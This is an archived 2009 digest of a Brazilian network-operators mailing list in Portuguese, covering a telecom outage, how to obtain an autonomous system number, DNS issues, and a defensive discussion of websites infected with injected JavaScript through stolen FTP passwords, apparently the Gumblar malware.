From omar at kaminski.com Mon Jun 1 03:06:25 2009 From: omar at kaminski.com (Omar Kaminski) Date: Mon, 1 Jun 2009 03:06:25 -0300 Subject: [GTER] BRT completamente fora aqui no RS References: <4A2328DB.1050801@cyberweb.com.br> <200905312352.51590.marcelo@standardnet.com.br> Message-ID: <5B1F7C17CB844F48B240D023001C3CB3@home> Aqui em casa (PR) est? o dia todo (e a noite) oscilando, n?o chegou a sair do ar mas est? e continua uma verdadeira gangorra... []s ----- Original Message ----- From: "Marcelo - SNET" To: "Grupo de Trabalho de Engenharia e Operacao de Redes" Sent: Sunday, May 31, 2009 23:52 Subject: Re: [GTER] BRT completamente fora aqui no RS Aqui nossos links da BRT ficaram fora do ar a partir das 17:45hrs, retornando ?s 20:35hrs. Celulares ainda n?o funcionam. Abra?os, Marcelo E. Geyer Em Domingo 31 Maio 2009, ?s 23:17:45, Eduardo Schoedler escreveu: > Sim, todos os nossos links BROi ficaram fora do ar por algumas horas aqui > no interior do RS. > Come?ou por volta as 16h e voltou ?s 19h. > > Aprentemente est? normalizado. > > Sds, > Eduardo. > > > ----- Original Message ----- > From: "Juliano Primavesi - Cyberweb Networks" > Sent: Sunday, May 31, 2009 10:03 PM > Subject: Re: [GTER] BRT completamente fora aqui no RS > > http://noticias.terra.com.br/brasil/interna/0,,OI3797269-EI8139,00-Incendio >+na+Oi+afeta+telefones+de+emergencia+de+Porto+Alegre.html > > Jean Rousseau Franco escreveu: > > Algu?m mais sentiu o impacto? > From bruno at openline.com.br Mon Jun 1 07:56:07 2009 From: bruno at openline.com.br (bruno at openline.com.br) Date: Mon, 01 Jun 2009 07:56:07 -0300 Subject: [GTER] SA - Sistema Autonomo Message-ID: <1243853767904.bruno@openline.com.br> --- "Newton M. Silva" escreveu: > Alguem poderia me passar o procedimento/pr?-requisitos para poder > se tornar uma AS ( Sistema autonomo). - Ser multihomed (mais de um backbone ou backbone+ptt) - Demonstrar necessidade de pelo menos 1000 IPs de imediato (o bloco inicial tem 4096 IPs equivalente a 16 classes C ou um /20) - Mais info em http://registro.br/info/cidr.html []s, !3runo Cabral From marcelo at standardnet.com.br Mon Jun 1 09:09:52 2009 From: marcelo at standardnet.com.br (Marcelo Estanislau) Date: Mon, 01 Jun 2009 09:09:52 -0300 Subject: [GTER] BRT completamente fora aqui no RS In-Reply-To: <5B1F7C17CB844F48B240D023001C3CB3@home> References: <4A2328DB.1050801@cyberweb.com.br> <200905312352.51590.marcelo@standardnet.com.br> <5B1F7C17CB844F48B240D023001C3CB3@home> Message-ID: <4A23C510.40207@standardnet.com.br> -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Neste instante, celulares da BrOi continuam fora na regi?o metropolitana do RS. Abra?os, Marcelo Estanislau Geyer marcelo at standardnet.com.br Standard Net Tecnologia http://www.standardnet.com.br - -- PGP Key: ldap://keyserver.pgp.com - Key ID 0x5812DE5E Omar Kaminski escreveu: > Aqui em casa (PR) est? o dia todo (e a noite) oscilando, n?o chegou a > sair do ar mas est? e continua uma verdadeira gangorra... > > []s > > > ----- Original Message ----- From: "Marcelo - SNET" > > To: "Grupo de Trabalho de Engenharia e Operacao de Redes" > > Sent: Sunday, May 31, 2009 23:52 > Subject: Re: [GTER] BRT completamente fora aqui no RS > > > Aqui nossos links da BRT ficaram fora do ar a partir das 17:45hrs, > retornando > ?s 20:35hrs. Celulares ainda n?o funcionam. > > Abra?os, > > Marcelo E. Geyer > > Em Domingo 31 Maio 2009, ?s 23:17:45, Eduardo Schoedler escreveu: >> Sim, todos os nossos links BROi ficaram fora do ar por algumas horas aqui >> no interior do RS. >> Come?ou por volta as 16h e voltou ?s 19h. >> >> Aprentemente est? normalizado. >> >> Sds, >> Eduardo. >> >> >> ----- Original Message ----- >> From: "Juliano Primavesi - Cyberweb Networks" >> Sent: Sunday, May 31, 2009 10:03 PM >> Subject: Re: [GTER] BRT completamente fora aqui no RS >> >> http://noticias.terra.com.br/brasil/interna/0,,OI3797269-EI8139,00-Incendio >> >> +na+Oi+afeta+telefones+de+emergencia+de+Porto+Alegre.html >> >> Jean Rousseau Franco escreveu: >> > Algu?m mais sentiu o impacto? >> > > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.9 (GNU/Linux) Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org iJwEAQECAAYFAkojxQoACgkQj5vBAlgS3l6BlQQAicEEeqUxKCg/r3L9FSpv+z5e Zc8st5jmxmoU15Xm84OYUzHJ26f6UKxEyDxMU+GBGKmbeQ7kel6jUOvbT+buTLG9 7dGTbfZPBFe3qsnrg08pdEwb7oG7Is0/6esBddlOyJ401ui4do03k/kJPu9NKMGp uSYaarIzgP7DVkczVCA= =AMs8 -----END PGP SIGNATURE----- From alfredo.dalava at gmail.com Mon Jun 1 08:14:16 2009 From: alfredo.dalava at gmail.com (=?ISO-8859-1?Q?Alfredo_Dal=B4Ava_J=FAnior?=) Date: Mon, 1 Jun 2009 08:14:16 -0300 Subject: [GTER] SA - Sistema Autonomo In-Reply-To: <1243853767904.bruno@openline.com.br> References: <1243853767904.bruno@openline.com.br> Message-ID: - Faltou mais um requisito: ter muuuita paci?ncia e ligar para os consultores e 0800 das operadoras 2 vezes por dia... Eu mesmo estou fazendo isso a mais de 45 dias e at? agora nada... 2009/6/1 bruno at openline.com.br > --- "Newton M. Silva" escreveu: > > Alguem poderia me passar o procedimento/pr?-requisitos para poder > > se tornar uma AS ( Sistema autonomo). > > - Ser multihomed (mais de um backbone ou backbone+ptt) > > - Demonstrar necessidade de pelo menos 1000 IPs de imediato > (o bloco inicial tem 4096 IPs equivalente a 16 classes C > ou um /20) From cleber-listas at inetweb.com.br Mon Jun 1 09:12:26 2009 From: cleber-listas at inetweb.com.br (Cleber - Listas) Date: Mon, 1 Jun 2009 09:12:26 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A__V=EDrus_em_sites?= In-Reply-To: References: Message-ID: Alexandre, Tem certeza que est? vindo via FTP, pois hoje em dia isso pode ocorrer de maneiras: *) Via FTP mesmo, pois o cliente pode ter um trojan instalado na maquina que fica monitorando e depois quando for transferir uma pagina index ou default, o javascript vai junto (j? ocorreu com cliente nosso) *) Via Upload, alguma pagina ASP ou PHP mal programada aceita o upload de um outro .ASP ou .PHP que se auto propaga em seu servidor nos diret?rios que tem permissao de escrita. Recomenda??o, somente libere escrita para os clientes que o solicitem e tenha um registro em hepldesk, excel ou at? mesmo em papel de p?o :) Se o caso realmente est? vindo via FTP, verifique para fazer bloqueios de IP's e avise seus usu?rios, por exemplo se sabe que o dominio abc.com.br tem acesso NET, fa?a um bloquei para a rede da NET do acesso ao dominio via FTP, ? uma forma de ir isolando o problema e chegar at? a fonte. Espero ter ajudado. Cleber -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Alexandre Gorges Enviada em: s?bado, 30 de maio de 2009 14:54 Para: Lista GTER Assunto: [GTER] V?rus em sites Boa tarde, Faz alguns 15 dias, que estou com problemas em alguns sites de clientes. N?o sei como ? descoberto a senha de FTP dos sites, mas o acesso sempre ? internacional. ? adicionado um javascript em todas as p?ginas do site do cliente. Alguns antivirus n?o detectam, mas outros como Avast, AVG e Symantec detectam. Algu?m tamb?m est? passando por esse problema? Botei o clamav para verificar o upload dos FTP. Mas infelizmente, o Clamav n?o detecta esse javascript. []'s Alexandre Gorges http://algorges.blogspot.com http://www.dag.eti.br MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com -- gter list https://eng.registro.br/mailman/listinfo/gter Nenhum v?rus encontrado nessa mensagem recebida. Verificado por AVG - www.avgbrasil.com.br Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.46/2143 - Data de Lan?amento: 05/30/09 05:53:00 From lscrlstld at gmail.com Mon Jun 1 09:53:36 2009 From: lscrlstld at gmail.com (Toledo, Luis Carlos) Date: Mon, 1 Jun 2009 09:53:36 -0300 Subject: [GTER] RES: Virus em sites In-Reply-To: References: <4A233419.5070901@jarruda.com> Message-ID: <42B5F22905AF4DFE9C680CFA5847F334@toledoPC> > >> > >> Curiosidade.... Para que tantas perguntas? Est? tentando de ajudar.. > > Se eles tiverem comprometido o servidor (nao os clientes), > e fizerem > > captura do trafego no mesmo servidor, eles podem obter a > senha de um > > ponto central (ja que e' FTP). Voce comentou que voce tem > limpado "o > > efeito" do breach, so que talvez simplesmente eles estejam > pegando as > > senhas na propria maquina FTP. > > J? foi desconsiderado isso, no servidor n?o tem nenhum usu?rio criado. > Pesquisando pelo malware Gumblar, vi que a senha ? descoberta > na m?quina do usu?rio com spyware. Muitos relatos de senhas > capturadas com quem usa o Filezilla para acesso ao FTP. Sim pode ocorrer dessa forma, mas a probabilidade do spywave infectar justamente aqueles clientes que fazem FTP com vc ? infima. Teriam que infectar milhares para encontrar um que hospeda com voc? e que faz ftp. Al?m disso, s?o mais de um cliente seu, o que complica as probabilidade. Imagino que haja um ponto em comum entre eles(clientes). > Os c?digos que peguei nos sites infectados, s?o java scripts > ou chamadas iframe para outros sites. Nenhuma programa??o PHP > que possa tentar acessar o servidor. > > O ataque come?a de fato no usu?rio e n?o no servidor. > N?o discarte assim t?o f?cil outras possibilidades. Talvez n?o seja necessariamente o servidor FTP, mas alguem que pode sniffar o tr?fego. Abs Toledo From algorges at gmail.com Mon Jun 1 10:18:57 2009 From: algorges at gmail.com (Alexandre Gorges) Date: Mon, 01 Jun 2009 10:18:57 -0300 Subject: [GTER] RES: Virus em sites In-Reply-To: <42B5F22905AF4DFE9C680CFA5847F334@toledoPC> Message-ID: Bom dia, Toledo >> >> J? foi desconsiderado isso, no servidor n?o tem nenhum usu?rio criado. >> Pesquisando pelo malware Gumblar, vi que a senha ? descoberta >> na m?quina do usu?rio com spyware. Muitos relatos de senhas >> capturadas com quem usa o Filezilla para acesso ao FTP. > > Sim pode ocorrer dessa forma, mas a probabilidade do spywave infectar > justamente aqueles clientes que fazem FTP com vc ? infima. > Teriam que infectar milhares para encontrar um que hospeda com voc? e que > faz ftp. > Al?m disso, s?o mais de um cliente seu, o que complica as probabilidade. > Imagino que haja um ponto em comum entre eles(clientes). Mas eu n?o estou dizendo que est? acontecendo apenas comigo. Se voc? pesquisar por Gumblar, ir? ver v?rios casos de troca de site por FTP. De 730 dom?nios, foram infectados aqui 5 sites. E clientes sem rela??o entre eles, nem o desenvolvedor dos sites ? o mesmo. Um amigo de outro provedor, tamb?m relatou mesmo problema. Para alguns clientes apenas. From newton.medeiros at gmail.com Mon Jun 1 09:55:03 2009 From: newton.medeiros at gmail.com (Newton M. Silva) Date: Mon, 1 Jun 2009 09:55:03 -0300 Subject: [GTER] SA - Sistema Autonomo In-Reply-To: References: <1243853767904.bruno@openline.com.br> Message-ID: <7f771cf20906010555g2eec70abq914576a2cd1f2fc@mail.gmail.com> Ok. Muito obrigado a todos!!! abra?os 2009/6/1 Alfredo Dal?Ava J?nior > - Faltou mais um requisito: ter muuuita paci?ncia e ligar para os > consultores e 0800 das operadoras 2 vezes por dia... > Eu mesmo estou fazendo isso a mais de 45 dias e at? agora nada... > > > > 2009/6/1 bruno at openline.com.br > > > --- "Newton M. Silva" escreveu: > > > Alguem poderia me passar o procedimento/pr?-requisitos para poder > > > se tornar uma AS ( Sistema autonomo). > > > > - Ser multihomed (mais de um backbone ou backbone+ptt) > > > > - Demonstrar necessidade de pelo menos 1000 IPs de imediato > > (o bloco inicial tem 4096 IPs equivalente a 16 classes C > > ou um /20) > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- Eng?. Newton M. Silva From eduardo at sinos.net Mon Jun 1 10:04:41 2009 From: eduardo at sinos.net (Eduardo Santos Back) Date: Mon, 01 Jun 2009 10:04:41 -0300 Subject: [GTER] BRT completamente fora aqui no RS In-Reply-To: <4A23C510.40207@standardnet.com.br> References: <4A2328DB.1050801@cyberweb.com.br> <200905312352.51590.marcelo@standardnet.com.br> <5B1F7C17CB844F48B240D023001C3CB3@home> <4A23C510.40207@standardnet.com.br> Message-ID: <4A23D1E9.7020306@sinos.net> E v?o continuar por um bom tempo, segundo me disseram h? pouco. Sem previs?o de retorno ainda. Atenciosamente, Eduardo Santos Back Gerente de Inform?tica Grupo Editorial Sinos SA +55 51 3594-0417 www.gruposinos.com.br Marcelo Estanislau escreveu: > -----BEGIN PGP SIGNED MESSAGE----- > Hash: SHA1 > > Neste instante, celulares da BrOi continuam fora na regi?o metropolitana > do RS. > > Abra?os, > > Marcelo Estanislau Geyer > marcelo at standardnet.com.br > Standard Net Tecnologia > http://www.standardnet.com.br > - -- > PGP Key: ldap://keyserver.pgp.com - Key ID 0x5812DE5E > > > Omar Kaminski escreveu: > >> Aqui em casa (PR) est? o dia todo (e a noite) oscilando, n?o chegou a >> sair do ar mas est? e continua uma verdadeira gangorra... >> >> []s >> >> >> ----- Original Message ----- From: "Marcelo - SNET" >> >> To: "Grupo de Trabalho de Engenharia e Operacao de Redes" >> >> Sent: Sunday, May 31, 2009 23:52 >> Subject: Re: [GTER] BRT completamente fora aqui no RS >> >> >> Aqui nossos links da BRT ficaram fora do ar a partir das 17:45hrs, >> retornando >> ?s 20:35hrs. Celulares ainda n?o funcionam. >> >> Abra?os, >> >> Marcelo E. Geyer >> >> Em Domingo 31 Maio 2009, ?s 23:17:45, Eduardo Schoedler escreveu: >> >>> Sim, todos os nossos links BROi ficaram fora do ar por algumas horas aqui >>> no interior do RS. >>> Come?ou por volta as 16h e voltou ?s 19h. >>> >>> Aprentemente est? normalizado. >>> >>> Sds, >>> Eduardo. >>> >>> >>> ----- Original Message ----- >>> From: "Juliano Primavesi - Cyberweb Networks" >>> Sent: Sunday, May 31, 2009 10:03 PM >>> Subject: Re: [GTER] BRT completamente fora aqui no RS >>> >>> http://noticias.terra.com.br/brasil/interna/0,,OI3797269-EI8139,00-Incendio >>> >>> +na+Oi+afeta+telefones+de+emergencia+de+Porto+Alegre.html >>> >>> Jean Rousseau Franco escreveu: >>> >>>> Algu?m mais sentiu o impacto? >>>> >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > -----BEGIN PGP SIGNATURE----- > Version: GnuPG v1.4.9 (GNU/Linux) > Comment: Using GnuPG with Fedora - http://enigmail.mozdev.org > > iJwEAQECAAYFAkojxQoACgkQj5vBAlgS3l6BlQQAicEEeqUxKCg/r3L9FSpv+z5e > Zc8st5jmxmoU15Xm84OYUzHJ26f6UKxEyDxMU+GBGKmbeQ7kel6jUOvbT+buTLG9 > 7dGTbfZPBFe3qsnrg08pdEwb7oG7Is0/6esBddlOyJ401ui4do03k/kJPu9NKMGp > uSYaarIzgP7DVkczVCA= > =AMs8 > -----END PGP SIGNATURE----- > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From thilizardo at gmail.com Mon Jun 1 10:17:51 2009 From: thilizardo at gmail.com (Thiago Lizardo de Moraes) Date: Mon, 1 Jun 2009 10:17:51 -0300 Subject: [GTER] =?iso-8859-1?q?Problemas_com_resolu=E7=E3o_de_nomes_-_Reso?= =?iso-8859-1?q?lver/DNS_BrasilTelecom?= Message-ID: <9697f7750906010617p2f39ab79p6ee39226d413b4b6@mail.gmail.com> Pessoal, Voc?s perceberam problemas referente a resolu??o de Nomes(Resolver) da BrasilTelecom? Sabem se ocorreu algum cenario de mudan?a de endere?o IP, filtros por IPs de origem(resolvendo somente para IPs da BrT), redirecionamento, etc. Obrigado, -- Thiago Lizardo de Moraes Consultor T?cnico +55 41 8838 8561 From filipe.m at hostdime.com.br Mon Jun 1 10:18:02 2009 From: filipe.m at hostdime.com.br (filipe mendes) Date: Mon, 1 Jun 2009 10:18:02 -0300 Subject: [GTER] SA - Sistema Autonomo In-Reply-To: References: <1243853767904.bruno@openline.com.br> Message-ID: Eu recebi meu AS ha uns 2 meses e estou numa eterna luta para publica-los nas operadoras tb.. 2009/6/1 Alfredo Dal?Ava J?nior > - Faltou mais um requisito: ter muuuita paci?ncia e ligar para os > consultores e 0800 das operadoras 2 vezes por dia... > Eu mesmo estou fazendo isso a mais de 45 dias e at? agora nada... > > > > 2009/6/1 bruno at openline.com.br > > > --- "Newton M. Silva" escreveu: > > > Alguem poderia me passar o procedimento/pr?-requisitos para poder > > > se tornar uma AS ( Sistema autonomo). > > > > - Ser multihomed (mais de um backbone ou backbone+ptt) > > > > - Demonstrar necessidade de pelo menos 1000 IPs de imediato > > (o bloco inicial tem 4096 IPs equivalente a 16 classes C > > ou um /20) > -- > gter list https://eng.registro.br/mailman/listinfo/gter > From cleber-listas at inetweb.com.br Mon Jun 1 10:32:30 2009 From: cleber-listas at inetweb.com.br (Cleber - Listas) Date: Mon, 1 Jun 2009 10:32:30 -0300 Subject: [GTER] RES: SA - Sistema Autonomo In-Reply-To: References: <1243853767904.bruno@openline.com.br> Message-ID: <6A47709462534849BDCE531DE04758B1@INETWEB.local> Ol? Pessoal, Tamb?m estamos buscando para entrar no processo de solicita??o do AS e baseando nos problemas que os amigos possuem hoje, fico na Duvida o quanto positivo ser? para n?s sermos um AS hoje. Gostaria de aproveitar e fazer algumas perguntas: *) Me tornando um AS, caso tenha dificuldades na publica??o entre provedores, posso ficar fora do ar (caso tamb?m tenha um bloco de Ips)? *) Que tipo de equipamento em especial preciso (Roteador Cisco ou posso utilizar Quagga) ? *) Sabem de existencia de um IDC que n?o permite clientes com AS pr?prio? *) Quanto de esfor?o adicional em pessoal seria necess?rio ter, pois hoje contratamos os links e Ips das operadoras e esse trabalho ? deles. Desde j?, agrade?o a todos. Abra?os Cleber Saad -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de filipe mendes Enviada em: segunda-feira, 1 de junho de 2009 10:18 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] SA - Sistema Autonomo Eu recebi meu AS ha uns 2 meses e estou numa eterna luta para publica-los nas operadoras tb.. 2009/6/1 Alfredo Dal?Ava J?nior > - Faltou mais um requisito: ter muuuita paci?ncia e ligar para os > consultores e 0800 das operadoras 2 vezes por dia... > Eu mesmo estou fazendo isso a mais de 45 dias e at? agora nada... > > > > 2009/6/1 bruno at openline.com.br > > > --- "Newton M. Silva" escreveu: > > > Alguem poderia me passar o procedimento/pr?-requisitos para poder > > > se tornar uma AS ( Sistema autonomo). > > > > - Ser multihomed (mais de um backbone ou backbone+ptt) > > > > - Demonstrar necessidade de pelo menos 1000 IPs de imediato (o bloco > > inicial tem 4096 IPs equivalente a 16 classes C ou um /20) > -- > gter list https://eng.registro.br/mailman/listinfo/gter > -- gter list https://eng.registro.br/mailman/listinfo/gter Nenhum v?rus encontrado nessa mensagem recebida. Verificado por AVG - www.avgbrasil.com.br Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.46/2143 - Data de Lan?amento: 05/30/09 05:53:00 From cleber-listas at inetweb.com.br Mon Jun 1 10:28:12 2009 From: cleber-listas at inetweb.com.br (Cleber - Listas) Date: Mon, 1 Jun 2009 10:28:12 -0300 Subject: [GTER] =?iso-8859-1?q?RES=3A__Problemas_com_resolu=E7=E3o_de_nome?= =?iso-8859-1?q?s_-_Resolver/DNS_BrasilTelecom?= In-Reply-To: <9697f7750906010617p2f39ab79p6ee39226d413b4b6@mail.gmail.com> References: <9697f7750906010617p2f39ab79p6ee39226d413b4b6@mail.gmail.com> Message-ID: Talvez n?o seja devido estarem com problemas na rede Ip etc da Oi? Abra?os -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Thiago Lizardo de Moraes Enviada em: segunda-feira, 1 de junho de 2009 10:18 Para: gter at eng.registro.br Assunto: [GTER] Problemas com resolu??o de nomes - Resolver/DNS BrasilTelecom Pessoal, Voc?s perceberam problemas referente a resolu??o de Nomes(Resolver) da BrasilTelecom? Sabem se ocorreu algum cenario de mudan?a de endere?o IP, filtros por IPs de origem(resolvendo somente para IPs da BrT), redirecionamento, etc. Obrigado, -- Thiago Lizardo de Moraes Consultor T?cnico +55 41 8838 8561 -- gter list https://eng.registro.br/mailman/listinfo/gter Nenhum v?rus encontrado nessa mensagem recebida. Verificado por AVG - www.avgbrasil.com.br Vers?o: 8.5.339 / Banco de dados de v?rus: 270.12.46/2143 - Data de Lan?amento: 05/30/09 05:53:00 From fernando at bluesolutions.com.br Mon Jun 1 10:23:41 2009 From: fernando at bluesolutions.com.br (Fernando Ulisses dos Santos) Date: Mon, 01 Jun 2009 10:23:41 -0300 Subject: [GTER] =?iso-8859-1?q?V=EDrus_em_sites?= In-Reply-To: <6b484ce70905311103j4d2d6ca3y9ada78189d225d89@mail.gmail.com> References: <31f2f4aa0905301142se36c055n41eef721afd43d8e@mail.gmail.com> <6b484ce70905311103j4d2d6ca3y9ada78189d225d89@mail.gmail.com> Message-ID: <4A23D65D.6050903@bluesolutions.com.br> Alexandre, Pode ter ocorrido o seguinte: a partir do usu?rio e senha de um cliente seu, algu?m conseguiu acessar seu servidor e colocou um execut?vel ou script. Esse execut?vel pode ter sido usado para escalar privil?gio, o atacante ganhou acesso root e copiou seu arquivo de senhas. Voc? pode at? ter fechado essa brecha (com uma atualiza??o, por exemplo), mas, com o arquivo de senhas, o atacante pode ter deixado um ataque de for?a bruta contra seu arquivo de senhas, e, conforme vai quebrando, vai infectando os sites. Para observar esse padr?o, voc? pode mapear os clientes que foram infectados na ordem, tamb?m o quanto forte eram as senhas (se as mais fracas foram quebradas primeiro). Para parar o ataque nesse caso, trocar a senha de todo mundo, rodar o chkrootkit no servidor. Outra possibilidade: seu site principal, ou algum site da sua cidade, que seus clientes acessam com frequ?ncia, foi infectado em alguma parte. Sem a devida prote??o de antiv?rus, seus clientes s?o infectados assim que acessam esse site, esse pode ser o ponto comum entre eles. Nesse caso, n?o ? s? voc? que ser? afetado, mas outros provedores locais tamb?m. Fernando Ulisses dos Santos Blue Solutions - Solu??es em TI 19-3321-9068 / 11-4062-9218 fernando at bluesolutions.com.br Em 31-05-2009 15:03, Alexandre Gorges escreveu: > Meu caro, n?o ? via sql injection. os sites nem tem banco de dados. > ? via ftp, olhei os logs. a pessoa loga, puxa o site do cliente e coloca o > site denovo com as paginas html, php o que for com o java dentro. alguns > casos at? um iframe. > > Coloquei o clamav para verificar os upload do ftp. de sexta para hoje, pegou > 5 arquivos que a pessoa tentou fazer o upload para o servidor. > > 2009/5/30 Lauro Cesar de Oliveira > > >> Meu caro, isso ? via sql injection ou algum formulario php/perl/cgi-bin com >> permiss?o de escrita. >> Voc? precisa verificar as permiss?es dos arquivos. >> >> E encontrar o formul?rio html que est? servido de input para esse >> javascript. >> >> >> 2009/5/30 Alexandre Gorges >> >> >>> Boa tarde, >>> Faz alguns 15 dias, que estou com problemas em alguns sites de clientes. >>> N?o sei como ? descoberto a senha de FTP dos sites, mas o acesso sempre ? >>> internacional. >>> ? adicionado um javascript em todas as p?ginas do site do cliente. Alguns >>> antivirus n?o detectam, mas outros como Avast, AVG e Symantec detectam. >>> >>> Algu?m tamb?m est? passando por esse problema? >>> Botei o clamav para verificar o upload dos FTP. Mas infelizmente, o >>> >> Clamav >> >>> n?o detecta esse javascript. >>> >>> >>> []'s >>> Alexandre Gorges >>> http://algorges.blogspot.com >>> http://www.dag.eti.br >>> MSN/Gtalk/iCHAT/Skype/Jabber: algorges at gmail.com >>> >>> >>> >>> -- >>> gter list https://eng.registro.br/mailman/listinfo/gter >>> >>> >> >> -- >> Lauro Cesar de Oliveira >> http://www.gurulinux.blog.br >> Hack to learn not learn to hack. >> -- >> gter list https://eng.registro.br/mailman/listinfo/gter >> >> > > > > From jarruda-gter at jarruda.com Mon Jun 1 10:46:50 2009 From: jarruda-gter at jarruda.com (Julio Arruda) Date: Mon, 01 Jun 2009 09:46:50 -0400 Subject: [GTER] RES: Virus em sites In-Reply-To: References: Message-ID: <4A23DBCA.6020908@jarruda.com> Alexandre Gorges wrote: > Bom dia, Toledo > >>> J? foi desconsiderado isso, no servidor n?o tem nenhum usu?rio criado. >>> Pesquisando pelo malware Gumblar, vi que a senha ? descoberta >>> na m?quina do usu?rio com spyware. Muitos relatos de senhas >>> capturadas com quem usa o Filezilla para acesso ao FTP. >> Sim pode ocorrer dessa forma, mas a probabilidade do spywave infectar >> justamente aqueles clientes que fazem FTP com vc ? infima. >> Teriam que infectar milhares para encontrar um que hospeda com voc? e que >> faz ftp. >> Al?m disso, s?o mais de um cliente seu, o que complica as probabilidade. >> Imagino que haja um ponto em comum entre eles(clientes). > > Mas eu n?o estou dizendo que est? acontecendo apenas comigo. > Se voc? pesquisar por Gumblar, ir? ver v?rios casos de troca de site por > FTP. > De 730 dom?nios, foram infectados aqui 5 sites. E clientes sem rela??o entre > eles, nem o desenvolvedor dos sites ? o mesmo. > Um amigo de outro provedor, tamb?m relatou mesmo problema. Para alguns > clientes apenas. Vamos imaginar que somente estes 5 fizeram updates via FTP desde que houve o problema ? Isto poderia explicar por que os outros nao foram 'contaminados' ? Eu sou um pouco paranoico, e se alguem comprometer uma maquina minha, mesmo que tenha aparencia de ser algo 'periferico' (os arquivos FTP), eu ao menos daria uma verificada para ver se nao teve algo mais. Obvio que e' facil para alguem que nao administra isto falar :-), mas... Uma outra coisa que voce pode tentar fazer e' dar uma verificada no trafego deste servidor, ver se nao tem sessoes outgoing dele 'inesperadas', um tipo de NBA manual :-)..Um outros facil, verificar trafego para porta tcp 6667 outbound. From nelson at pangeia.com.br Mon Jun 1 10:59:24 2009 From: nelson at pangeia.com.br (Nelson Murilo) Date: Mon, 1 Jun 2009 10:59:24 -0300 Subject: [GTER] RES: Virus em sites In-Reply-To: References: <42B5F22905AF4DFE9C680CFA5847F334@toledoPC> Message-ID: <20090601135924.GM4359@pangeia.com.br> Alexandre, uma forma de confirmar a acao do malware e/ou salvar essa thread do loop infinito, seria mudar a senha de um cliente teoricamente infectado e pedir para ele fazer um acesso, esperar um tempo e ver se o script malicioso surge e de onde. ./nelson -murilo - http://ysts.org On Mon, Jun 01, 2009 at 10:18:57AM -0300, Alexandre Gorges wrote: > De 730 dom?nios, foram infectados aqui 5 sites. E clientes sem rela??o entre > eles, nem o desenvolvedor dos sites ? o mesmo. > Um amigo de outro provedor, tamb?m relatou mesmo problema. Para alguns > clientes apenas. From security at neogrid.com Mon Jun 1 11:03:49 2009 From: security at neogrid.com (NOC NeoGrid) Date: Mon, 1 Jun 2009 11:03:49 -0300 Subject: [GTER] RES: RES: Virus em sites In-Reply-To: <4A23DBCA.6020908@jarruda.com> References: <4A23DBCA.6020908@jarruda.com> Message-ID: Bom dia, Mandei um "exemplo" do c?digo para saber se era similar ao que foi encontrado nos sites de quem iniciou a "thread", mas ningu?m respondeu ( nem que sim, nem que n?o ). Seria interessante mostrar o que identificaram nos arquivos, assim evitamos diversas "possibilidades". Att, Dilson NOC - Neogrid www.neogrid.com -----Mensagem original----- De: gter-bounces at eng.registro.br [mailto:gter-bounces at eng.registro.br] Em nome de Julio Arruda Enviada em: segunda-feira, 1 de junho de 2009 10:47 Para: Grupo de Trabalho de Engenharia e Operacao de Redes Assunto: Re: [GTER] RES: Virus em sites Alexandre Gorges wrote: > Bom dia, Toledo > >>> J? foi desconsiderado isso, no servidor n?o tem nenhum usu?rio criado. >>> Pesquisando pelo malware Gumblar, vi que a senha ? descoberta >>> na m?quina do usu?rio com spyware. Muitos relatos de senhas >>> capturadas com quem usa o Filezilla para acesso ao FTP. >> Sim pode ocorrer dessa forma, mas a probabilidade do spywave infectar >> justamente aqueles clientes que fazem FTP com vc ? infima. >> Teriam que infectar milhares para encontrar um que hospeda com voc? e que >> faz ftp. >> Al?m disso, s?o mais de um cliente seu, o que complica as probabilidade. >> Imagino que haja um ponto em comum entre eles(clientes). > > Mas eu n?o estou dizendo que est? acontecendo apenas comigo. > Se voc? pesquisar por Gumblar, ir? ver v?rios casos de troca de site por > FTP. > De 730 dom?nios, foram infectados aqui 5 sites. E clientes sem rela??o entre > eles, nem o desenvolvedor dos sites ? o mesmo. > Um amigo de outro provedor, tamb?m relatou mesmo problema. Para alguns > clientes apenas. Vamos imaginar que somente estes 5 fizeram updates via FTP desde que houve o problema ? Isto poderia explicar por que os outros nao foram 'contaminados' ? Eu sou um pouco paranoico, e se alguem comprometer uma maquina minha, mesmo que tenha aparencia de ser algo 'periferico' (os arquivos FTP), eu ao menos daria uma verificada para ver se nao teve algo mais. Obvio que e' facil para alguem que nao administra isto falar :-), mas... Uma outra coisa que voce pode tentar fazer e' dar uma verificada no trafego deste servidor, ver se nao tem sessoes outgoing dele 'inesperadas', um tipo de NBA manual :-)..Um outros facil, verificar trafego para porta tcp 6667 outbound. -- gter list https://eng.registro.br/mailman/listinfo/gter From marcelo at tpn.com.br Mon Jun 1 11:07:26 2009 From: marcelo at tpn.com.br (Marcelo Coelho) Date: Mon, 1 Jun 2009 11:07:26 -0300 Subject: [GTER] Virus em sites In-Reply-To: References: Message-ID: <07BCF034-8D09-4E71-A061-1C62A2A23309@tpn.com.br> On 31/05/2009, at 23:45, Alexandre Gorges wrote: > Os c?digos que peguei nos sites infectados, s?o java scripts ou > chamadas > iframe para outros sites. Nenhuma programa??o PHP que possa tentar > acessar o > servidor. > > O ataque come?a de fato no usu?rio e n?o no servidor. Sim, mas n?o somente para quem utiliza Filezilla. J? tive relatos de usu?rios com o WS_FTP com o mesmo problema. Acho pouco prov?vel que o malware esteja capturando senhas por snif, deve estar procurando por arquivos .ini dos programas de FTP. Alguns destes programas n?o possuem prote??o alguma na senha de sites armazenados. Se voc? tiver um log de FTP, verifique se o envio das p?ginas com v?rus n?o est? vindo do mesmo IP. ? poss?vel que as senhas tenham sido capturadas em um determinado intervalo de tempo, por?m a invas?o dos sites foi feita de uma ?nica vez. -- Marcelo Coelho marcelo 